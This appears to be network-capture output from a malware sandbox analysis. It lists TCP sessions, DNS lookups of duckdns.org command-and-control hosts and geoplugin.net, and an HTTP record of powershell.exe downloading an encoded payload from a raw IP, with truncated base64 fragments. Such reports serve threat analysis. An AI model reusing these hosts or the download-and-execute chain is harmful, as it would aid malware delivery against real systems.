May 2, 2024 17:21:56.056248903 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.056248903 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.056287050 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.056294918 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.056315899 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.056333065 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.056355000 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.056380033 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.056426048 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.056494951 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.056536913 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.056549072 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.056562901 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.056586981 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.056606054 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.056693077 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.056736946 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.056785107 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.056829929 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.056854963 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.056893110 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.056915045 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.056957960 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.057005882 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.057045937 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.057053089 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.057081938 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.057105064 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.057145119 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.057226896 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.057277918 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.057406902 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.057421923 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.057451963 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.057466984 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.057476997 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.057504892 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.057518005 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.057559013 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.057576895 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.057611942 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.057615995 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.057657003 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.057718992 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.057761908 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.057799101 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.057867050 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.057898998 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.057923079 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.057940006 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.057986975 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.058065891 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.058109045 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.058130026 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.058176994 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.058248043 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.058295012 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.058330059 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.058362961 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.058376074 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.058397055 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.058422089 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.058463097 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.058576107 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.058619022 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.058650017 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.058698893 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.058723927 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.058763981 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.058841944 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.058890104 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.058942080 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.058990002 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:58.243765116 CEST | 49750 | 443 | 192.168.2.4 | 13.85.23.86
May 2, 2024 17:21:58.243809938 CEST | 443 | 49750 | 13.85.23.86 | 192.168.2.4
May 2, 2024 17:21:58.243868113 CEST | 49750 | 443 | 192.168.2.4 | 13.85.23.86
May 2, 2024 17:21:58.244316101 CEST | 49750 | 443 | 192.168.2.4 | 13.85.23.86
May 2, 2024 17:21:58.244329929 CEST | 443 | 49750 | 13.85.23.86 | 192.168.2.4
May 2, 2024 17:21:58.633485079 CEST | 443 | 49750 | 13.85.23.86 | 192.168.2.4
May 2, 2024 17:21:58.633591890 CEST | 49750 | 443 | 192.168.2.4 | 13.85.23.86
May 2, 2024 17:21:58.635189056 CEST | 49750 | 443 | 192.168.2.4 | 13.85.23.86
May 2, 2024 17:21:58.635200024 CEST | 443 | 49750 | 13.85.23.86 | 192.168.2.4
May 2, 2024 17:21:58.635423899 CEST | 443 | 49750 | 13.85.23.86 | 192.168.2.4
May 2, 2024 17:21:58.644474030 CEST | 49750 | 443 | 192.168.2.4 | 13.85.23.86
May 2, 2024 17:21:58.688154936 CEST | 443 | 49750 | 13.85.23.86 | 192.168.2.4
May 2, 2024 17:21:59.015647888 CEST | 443 | 49750 | 13.85.23.86 | 192.168.2.4
May 2, 2024 17:21:59.015675068 CEST | 443 | 49750 | 13.85.23.86 | 192.168.2.4
May 2, 2024 17:21:59.015687943 CEST | 443 | 49750 | 13.85.23.86 | 192.168.2.4
May 2, 2024 17:21:59.015846014 CEST | 49750 | 443 | 192.168.2.4 | 13.85.23.86
May 2, 2024 17:21:59.015867949 CEST | 443 | 49750 | 13.85.23.86 | 192.168.2.4
May 2, 2024 17:21:59.015940905 CEST | 49750 | 443 | 192.168.2.4 | 13.85.23.86
May 2, 2024 17:21:59.020950079 CEST | 49750 | 443 | 192.168.2.4 | 13.85.23.86
                                                                              May 2, 2024 17:21:59.020963907 CEST4434975013.85.23.86192.168.2.4
                                                                              May 2, 2024 17:21:59.020982027 CEST49750443192.168.2.413.85.23.86
                                                                              May 2, 2024 17:21:59.020987988 CEST4434975013.85.23.86192.168.2.4
                                                                              May 2, 2024 17:22:00.162719011 CEST497513050192.168.2.4192.169.69.26
                                                                              May 2, 2024 17:22:00.365681887 CEST305049751192.169.69.26192.168.2.4
                                                                              May 2, 2024 17:22:00.366187096 CEST497513050192.168.2.4192.169.69.26
                                                                              May 2, 2024 17:22:00.743087053 CEST497513050192.168.2.4192.169.69.26
                                                                              May 2, 2024 17:22:00.886236906 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:22:00.886313915 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:22:00.921201944 CEST305049751192.169.69.26192.168.2.4
                                                                              May 2, 2024 17:22:02.850045919 CEST497523051192.168.2.4192.169.69.26
                                                                              May 2, 2024 17:22:03.169625998 CEST305149752192.169.69.26192.168.2.4
                                                                              May 2, 2024 17:22:03.169708014 CEST497523051192.168.2.4192.169.69.26
                                                                              May 2, 2024 17:22:03.175049067 CEST497523051192.168.2.4192.169.69.26
                                                                              May 2, 2024 17:22:03.351547956 CEST305149752192.169.69.26192.168.2.4
                                                                              May 2, 2024 17:22:03.464333057 CEST497533050192.168.2.445.88.90.110
                                                                              May 2, 2024 17:22:03.625674963 CEST30504975345.88.90.110192.168.2.4
                                                                              May 2, 2024 17:22:03.625766039 CEST497533050192.168.2.445.88.90.110
                                                                              May 2, 2024 17:22:03.627065897 CEST497533050192.168.2.445.88.90.110
                                                                              May 2, 2024 17:22:03.808949947 CEST30504975345.88.90.110192.168.2.4
                                                                              May 2, 2024 17:22:03.811743021 CEST497533050192.168.2.445.88.90.110
                                                                              May 2, 2024 17:22:03.970891953 CEST30504975345.88.90.110192.168.2.4
                                                                              May 2, 2024 17:22:04.024811029 CEST497533050192.168.2.445.88.90.110
                                                                              May 2, 2024 17:22:04.069436073 CEST4975480192.168.2.4178.237.33.50
                                                                              May 2, 2024 17:22:04.236486912 CEST8049754178.237.33.50192.168.2.4
                                                                              May 2, 2024 17:22:04.236829996 CEST4975480192.168.2.4178.237.33.50
                                                                              May 2, 2024 17:22:04.237040043 CEST4975480192.168.2.4178.237.33.50
                                                                              May 2, 2024 17:22:04.409076929 CEST8049754178.237.33.50192.168.2.4
                                                                              May 2, 2024 17:22:04.409657955 CEST4975480192.168.2.4178.237.33.50
                                                                              May 2, 2024 17:22:04.431658983 CEST497533050192.168.2.445.88.90.110
                                                                              May 2, 2024 17:22:04.642013073 CEST30504975345.88.90.110192.168.2.4
                                                                              May 2, 2024 17:22:05.410670996 CEST8049754178.237.33.50192.168.2.4
                                                                              May 2, 2024 17:22:05.410752058 CEST4975480192.168.2.4178.237.33.50
                                                                              May 2, 2024 17:22:10.180506945 CEST4972480192.168.2.423.33.40.21
                                                                              May 2, 2024 17:22:10.269186020 CEST804972423.33.40.21192.168.2.4
                                                                              May 2, 2024 17:22:10.269253969 CEST4972480192.168.2.423.33.40.21
                                                                              May 2, 2024 17:22:14.470976114 CEST49755443192.168.2.4142.250.80.68
                                                                              May 2, 2024 17:22:14.471004009 CEST44349755142.250.80.68192.168.2.4
                                                                              May 2, 2024 17:22:14.471069098 CEST49755443192.168.2.4142.250.80.68
                                                                              May 2, 2024 17:22:14.471524000 CEST49755443192.168.2.4142.250.80.68
                                                                              May 2, 2024 17:22:14.471534967 CEST44349755142.250.80.68192.168.2.4
                                                                              May 2, 2024 17:22:14.659343958 CEST44349755142.250.80.68192.168.2.4
                                                                              May 2, 2024 17:22:14.659636974 CEST49755443192.168.2.4142.250.80.68
                                                                              May 2, 2024 17:22:14.659665108 CEST44349755142.250.80.68192.168.2.4
                                                                              May 2, 2024 17:22:14.659959078 CEST44349755142.250.80.68192.168.2.4
                                                                              May 2, 2024 17:22:14.660243034 CEST49755443192.168.2.4142.250.80.68
                                                                              May 2, 2024 17:22:14.660301924 CEST44349755142.250.80.68192.168.2.4
                                                                              May 2, 2024 17:22:14.709806919 CEST49755443192.168.2.4142.250.80.68
                                                                              May 2, 2024 17:22:24.657505989 CEST44349755142.250.80.68192.168.2.4
                                                                              May 2, 2024 17:22:24.657579899 CEST44349755142.250.80.68192.168.2.4
                                                                              May 2, 2024 17:22:24.657747984 CEST49755443192.168.2.4142.250.80.68
                                                                              May 2, 2024 17:22:25.312180042 CEST49755443192.168.2.4142.250.80.68
                                                                              May 2, 2024 17:22:25.312248945 CEST44349755142.250.80.68192.168.2.4
                                                                              May 2, 2024 17:22:30.893359900 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:22:31.997128963 CEST30504975345.88.90.110192.168.2.4
                                                                              May 2, 2024 17:22:31.999084949 CEST497533050192.168.2.445.88.90.110
                                                                              May 2, 2024 17:22:32.204405069 CEST30504975345.88.90.110192.168.2.4
                                                                              May 2, 2024 17:23:02.391897917 CEST30504975345.88.90.110192.168.2.4
                                                                              May 2, 2024 17:23:02.394167900 CEST497533050192.168.2.445.88.90.110
                                                                              May 2, 2024 17:23:02.610630035 CEST30504975345.88.90.110192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 2, 2024 17:21:14.986474991 CEST | 65027 | 53 | 192.168.2.4 | 1.1.1.1
May 2, 2024 17:21:14.986624002 CEST | 62590 | 53 | 192.168.2.4 | 1.1.1.1
May 2, 2024 17:21:15.071367979 CEST | 53 | 49903 | 1.1.1.1 | 192.168.2.4
May 2, 2024 17:21:15.074764967 CEST | 53 | 65027 | 1.1.1.1 | 192.168.2.4
May 2, 2024 17:21:15.075894117 CEST | 53 | 62590 | 1.1.1.1 | 192.168.2.4
May 2, 2024 17:21:15.119060993 CEST | 53 | 51179 | 1.1.1.1 | 192.168.2.4
May 2, 2024 17:21:15.146805048 CEST | 61137 | 53 | 192.168.2.4 | 8.8.8.8
May 2, 2024 17:21:15.147078037 CEST | 51119 | 53 | 192.168.2.4 | 1.1.1.1
May 2, 2024 17:21:15.234682083 CEST | 53 | 61137 | 8.8.8.8 | 192.168.2.4
May 2, 2024 17:21:15.235089064 CEST | 53 | 51119 | 1.1.1.1 | 192.168.2.4
May 2, 2024 17:21:15.874007940 CEST | 53 | 56867 | 1.1.1.1 | 192.168.2.4
May 2, 2024 17:21:22.704431057 CEST | 138 | 138 | 192.168.2.4 | 192.168.2.255
May 2, 2024 17:21:32.935933113 CEST | 53 | 58570 | 1.1.1.1 | 192.168.2.4
May 2, 2024 17:21:51.998471975 CEST | 53457 | 53 | 192.168.2.4 | 1.1.1.1
May 2, 2024 17:21:52.523686886 CEST | 53 | 53457 | 1.1.1.1 | 192.168.2.4
May 2, 2024 17:21:52.994494915 CEST | 53 | 57853 | 1.1.1.1 | 192.168.2.4
May 2, 2024 17:21:53.363091946 CEST | 50450 | 53 | 192.168.2.4 | 1.1.1.1
May 2, 2024 17:21:53.992741108 CEST | 53 | 50450 | 1.1.1.1 | 192.168.2.4
May 2, 2024 17:22:00.057964087 CEST | 55561 | 53 | 192.168.2.4 | 1.1.1.1
May 2, 2024 17:22:00.161530972 CEST | 53 | 55561 | 1.1.1.1 | 192.168.2.4
May 2, 2024 17:22:03.353615999 CEST | 59135 | 53 | 192.168.2.4 | 1.1.1.1
May 2, 2024 17:22:03.463221073 CEST | 53 | 59135 | 1.1.1.1 | 192.168.2.4
May 2, 2024 17:22:03.976744890 CEST | 62696 | 53 | 192.168.2.4 | 1.1.1.1
May 2, 2024 17:22:04.066657066 CEST | 53 | 62696 | 1.1.1.1 | 192.168.2.4
May 2, 2024 17:22:14.495629072 CEST | 53 | 54753 | 1.1.1.1 | 192.168.2.4
May 2, 2024 17:22:18.534420013 CEST | 53 | 59160 | 1.1.1.1 | 192.168.2.4
May 2, 2024 17:22:27.888748884 CEST | 64969 | 53 | 192.168.2.4 | 1.1.1.1
May 2, 2024 17:22:27.979629993 CEST | 53 | 64969 | 1.1.1.1 | 192.168.2.4
May 2, 2024 17:22:42.901709080 CEST | 53 | 63635 | 1.1.1.1 | 192.168.2.4
May 2, 2024 17:22:57.905337095 CEST | 54540 | 53 | 192.168.2.4 | 1.1.1.1
May 2, 2024 17:22:57.995158911 CEST | 53 | 54540 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 2, 2024 17:21:14.986474991 CEST | 192.168.2.4 | 1.1.1.1 | 0x7a1f | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
May 2, 2024 17:21:14.986624002 CEST | 192.168.2.4 | 1.1.1.1 | 0x213d | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
May 2, 2024 17:21:15.146805048 CEST | 192.168.2.4 | 8.8.8.8 | 0x84f6 | Standard query (0) | google.com | A (IP address) | IN (0x0001) | false
May 2, 2024 17:21:15.147078037 CEST | 192.168.2.4 | 1.1.1.1 | 0x965b | Standard query (0) | google.com | A (IP address) | IN (0x0001) | false
May 2, 2024 17:21:51.998471975 CEST | 192.168.2.4 | 1.1.1.1 | 0x59d9 | Standard query (0) | duelvalenza.it | A (IP address) | IN (0x0001) | false
May 2, 2024 17:21:53.363091946 CEST | 192.168.2.4 | 1.1.1.1 | 0x9369 | Standard query (0) | www.duelvalenza.it | A (IP address) | IN (0x0001) | false
May 2, 2024 17:22:00.057964087 CEST | 192.168.2.4 | 1.1.1.1 | 0x9855 | Standard query (0) | jgbours284hawara01.duckdns.org | A (IP address) | IN (0x0001) | false
May 2, 2024 17:22:03.353615999 CEST | 192.168.2.4 | 1.1.1.1 | 0xab5a | Standard query (0) | jgbours284hawara02.duckdns.org | A (IP address) | IN (0x0001) | false
May 2, 2024 17:22:03.976744890 CEST | 192.168.2.4 | 1.1.1.1 | 0xcacf | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
May 2, 2024 17:22:27.888748884 CEST | 192.168.2.4 | 1.1.1.1 | 0x1864 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
May 2, 2024 17:22:57.905337095 CEST | 192.168.2.4 | 1.1.1.1 | 0x499a | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 2, 2024 17:21:15.074764967 CEST | 1.1.1.1 | 192.168.2.4 | 0x7a1f | No error (0) | www.google.com | | 142.250.80.68 | A (IP address) | IN (0x0001) | false
May 2, 2024 17:21:15.075894117 CEST | 1.1.1.1 | 192.168.2.4 | 0x213d | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
May 2, 2024 17:21:15.234682083 CEST | 8.8.8.8 | 192.168.2.4 | 0x84f6 | No error (0) | google.com | | 142.251.41.78 | A (IP address) | IN (0x0001) | false
May 2, 2024 17:21:15.235089064 CEST | 1.1.1.1 | 192.168.2.4 | 0x965b | No error (0) | google.com | | 142.251.40.174 | A (IP address) | IN (0x0001) | false
May 2, 2024 17:21:52.523686886 CEST | 1.1.1.1 | 192.168.2.4 | 0x59d9 | No error (0) | duelvalenza.it | | 46.254.34.12 | A (IP address) | IN (0x0001) | false
May 2, 2024 17:21:53.992741108 CEST | 1.1.1.1 | 192.168.2.4 | 0x9369 | No error (0) | www.duelvalenza.it | duelvalenza.it | | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 17:21:53.992741108 CEST | 1.1.1.1 | 192.168.2.4 | 0x9369 | No error (0) | duelvalenza.it | | 46.254.34.12 | A (IP address) | IN (0x0001) | false
May 2, 2024 17:22:00.161530972 CEST | 1.1.1.1 | 192.168.2.4 | 0x9855 | No error (0) | jgbours284hawara01.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001) | false
May 2, 2024 17:22:03.463221073 CEST | 1.1.1.1 | 192.168.2.4 | 0xab5a | No error (0) | jgbours284hawara02.duckdns.org | | 45.88.90.110 | A (IP address) | IN (0x0001) | false
May 2, 2024 17:22:04.066657066 CEST | 1.1.1.1 | 192.168.2.4 | 0xcacf | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
May 2, 2024 17:22:27.979629993 CEST | 1.1.1.1 | 192.168.2.4 | 0x1864 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
May 2, 2024 17:22:57.995158911 CEST | 1.1.1.1 | 192.168.2.4 | 0x499a | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                                              • slscr.update.microsoft.com
                                                                              • duelvalenza.it
                                                                              • 87.121.105.163
                                                                              • www.duelvalenza.it
                                                                              • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 87.121.105.163 | 80 | 7504 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 17:20:57.851933002 CEST | 173 | OUT | GET /Terminaljob.toc HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: 87.121.105.163
Connection: Keep-Alive
May 2, 2024 17:20:58.019577980 CEST | 1289 | IN | HTTP/1.1 200 OK
Date: Thu, 02 May 2024 15:20:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 30 Apr 2024 00:51:09 GMT
ETag: "6a170-61745c4035940"
Accept-Ranges: bytes
Content-Length: 434544
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
                                                                              Data Raw: 36 77 4c 55 56 58 45 42 6d 37 76 30 58 51 77 41 63 51 47 62 36 77 4a 4f 58 41 4e 63 4a 41 54 72 41 6e 51 45 63 51 47 62 75 55 51 67 53 33 2f 72 41 68 44 54 63 51 47 62 67 63 45 70 6f 65 58 48 36 77 4a 70 7a 58 45 42 6d 34 48 70 62 63 45 77 52 2b 73 43 75 79 44 72 41 6f 6e 37 36 77 4a 30 31 4f 73 43 46 31 2b 36 4a 61 30 72 6d 6e 45 42 6d 33 45 42 6d 33 45 42 6d 33 45 42 6d 7a 48 4b 36 77 4a 64 44 65 73 43 72 50 61 4a 46 41 74 78 41 5a 76 72 41 76 62 30 30 65 4c 72 41 6d 36 33 63 51 47 62 67 38 45 45 36 77 4a 51 6c 65 73 43 4c 31 69 42 2b 63 77 6b 55 67 46 38 79 6e 45 42 6d 2b 73 43 78 68 36 4c 52 43 51 45 36 77 4a 77 4f 6e 45 42 6d 34 6e 44 36 77 4c 73 7a 4f 73 43 30 6b 79 42 77 77 4f 36 6a 51 42 78 41 5a 74 78 41 5a 75 36 53 53 77 59 77 4f 73 43 61 4d 4e 78 41 5a 75 42 38 6c 6b 6c 33 36 37 72 41 71 77 75 36 77 49 4e 49 34 48 43 38 50 59 34 6b 65 73 43 54 2b 54 72 41 67 2b 6f 36 77 49 49 4a 33 45 42 6d 33 45 42 6d 33 45 42 6d 34 73 4d 45 4f 73 43 4c 69 78 78 41 5a 75 4a 44 42 50 72 41 67 45 49 36 77 [TRUNCATED]
Data Ascii: [TRUNCATED]
May 2, 2024 17:20:58.019593000 CEST | 1289 | IN | Data Raw: 79 59 76 6b 65 30 46 44 50 41 55 6a 44 2b 52 37 51 55 4f 45 45 75 69 74 34 66 6c 30 69 2b 54 57 62 35 72 56 46 4d 32 71 65 73 37 38 51 4f 79 61 2b 30 4a 6c 46 37 75 45 72 4c 7a 6c 43 39 7a 50 31 31 41 45 6c 72 32 79 50 44 48 50 74 61 59 4b 7a 62
                                                                              Data Ascii: yYvke0FDPAUjD+R7QUOEEuit4fl0i+TWb5rVFM2qes78QOya+0JlF7uErLzlC9zP11AElr2yPDHPtaYKzbJD7EEBjgnHhE8zK4G0BXwr/l2VTjZbQRl7cMkXmo7lgwRQbgDk/tt0Xbcf+CMXTEPk7Mt3qBtDzERtSEM+LsH0ZBdMyOigTUNlGMkcmuizxrxxu4UIDCrCm4aleryeyTtkF0zCGGOX92UXQ8fni0xD4dTF3ikWTEM
May 2, 2024 17:20:58.019803047 CEST | 1289 | IN | Data Raw: 6d 57 74 4a 4d 64 7a 31 70 74 4f 4f 65 41 48 37 61 6b 74 42 4f 65 42 78 59 45 33 6e 4e 6b 55 5a 78 64 4d 71 35 55 73 54 6b 4d 4e 67 7a 47 30 35 35 5a 34 5a 34 61 44 33 30 66 6b 49 32 67 69 2b 4a 4f 2f 46 4e 72 2b 74 72 67 36 6c 71 4e 5a 51 76 46
                                                                              Data Ascii: mWtJMdz1ptOOeAH7aktBOeBxYE3nNkUZxdMq5UsTkMNgzG055Z4Z4aD30fkI2gi+JO/FNr+trg6lqNZQvFrworYDXJFlqNRZPNbymo1SKiGr6f28mhZ8UVArpYQgJb8vQ9LS4l6Xe76wbh0OpZIZ46cU8mNQBxHZZjJx2UXTMjok0xDZa0KoWFdQ0tiMExD008MWV4x89oBEsPAtXbnDRXTCqMLlllz0tOnzwaAG0cJ/sxdi5vh
May 2, 2024 17:20:58.019817114 CEST | 1289 | IN | Data Raw: 6a 51 35 30 31 44 5a 52 68 45 47 59 49 58 54 4d 78 4e 6b 57 68 59 68 39 57 79 34 56 75 4a 61 79 44 6f 37 70 55 55 32 76 7a 57 78 4c 4b 57 69 38 52 62 62 51 76 43 69 6c 75 4b 50 48 69 57 69 39 41 6d 33 59 58 43 69 70 38 62 43 4b 36 65 53 36 45 41
                                                                              Data Ascii: jQ501DZRhEGYIXTMxNkWhYh9Wy4VuJayDo7pUU2vzWxLKWi8RbbQvCiluKPHiWi9Am3YXCip8bCK6eS6EAEm/q1cG4PBL/R3982tXCXJVELH0Bvi+tmCij+BnTunHLN6I2ejOSTkDliiJIJMw3AvQrWDosZDSuo1vaU82yrOd6I+Tmt9LsM8V6gt5yrvEOPPz3yOQa5BNoPvaeSMJRMzqkI4se+UriuETk1VL+XqrNqSimfIY2i
May 2, 2024 17:20:58.019881964 CEST | 1289 | IN | Data Raw: 37 6f 34 36 44 7a 61 6b 38 78 34 79 6d 35 4f 57 4e 74 41 6c 59 7a 59 47 6d 7a 50 52 63 37 41 56 41 62 7a 54 35 39 38 30 66 68 6f 6b 41 5a 7a 58 53 2f 2f 74 42 49 4a 69 50 44 75 6d 38 4f 69 36 57 6d 4e 4d 4a 32 5a 53 52 67 42 62 43 70 2f 37 2b 4b
                                                                              Data Ascii: 7o46Dzak8x4ym5OWNtAlYzYGmzPRc7AVAbzT5980fhokAZzXS//tBIJiPDum8Oi6WmNMJ2ZSRgBbCp/7+KR9FQ0N3W0xD41i4wciQaCEGx6FAY8Prut8q3w7gPHDfIJzZ0WQXTBXbPbBtf5aKN5nRXMKTSwMh8JaKfSx/DBP5nqxCVYoqeqRqbJ9gezr8cRvpv/TYs7KuB1dUiVPQyYmvXO++2FIU+K4uK0OmjHuAT3HTsgMPHa
May 2, 2024 17:20:58.019896030 CEST | 1289 | IN | Data Raw: 37 68 44 58 35 71 57 76 53 50 72 73 34 58 52 6f 76 4a 58 6a 48 4f 76 6e 75 43 61 51 65 5a 41 39 2f 2f 41 41 59 52 63 63 2b 32 43 74 55 4a 35 49 72 79 59 66 5a 43 4c 4f 7a 70 30 76 59 57 67 6f 4c 76 46 75 77 57 4f 7a 5a 6a 4f 4c 78 61 56 73 45 64
                                                                              Data Ascii: 7hDX5qWvSPrs4XRovJXjHOvnuCaQeZA9//AAYRcc+2CtUJ5IryYfZCLOzp0vYWgoLvFuwWOzZjOLxaVsEdF6tm5a63VyS8N6+wIA0c08p7iKHs8tjflIqbzIgztxu4WfBRT9JaQRETasOmuX1c2wvaKShuTUdcnfAc2oIgKDR+T8HRVyDsVQbvwHe9H8ALpr1ySlPOch4rePtlruStglgxRwb8HxoxrPytnabH0suNZaGhhq0Hs
May 2, 2024 17:20:58.019946098 CEST | 1289 | IN | Data Raw: 51 58 57 61 4d 70 6a 44 74 62 4a 4a 49 57 41 49 61 35 33 45 73 4a 4a 4d 36 50 6c 31 33 30 62 2f 4c 43 57 75 30 2f 6b 34 46 6a 53 6b 6b 54 4e 74 49 56 75 2f 30 4c 6b 2b 4a 41 4c 31 6b 6e 46 56 41 2b 35 4d 53 58 64 41 6a 4f 6f 64 65 42 69 6a 58 78
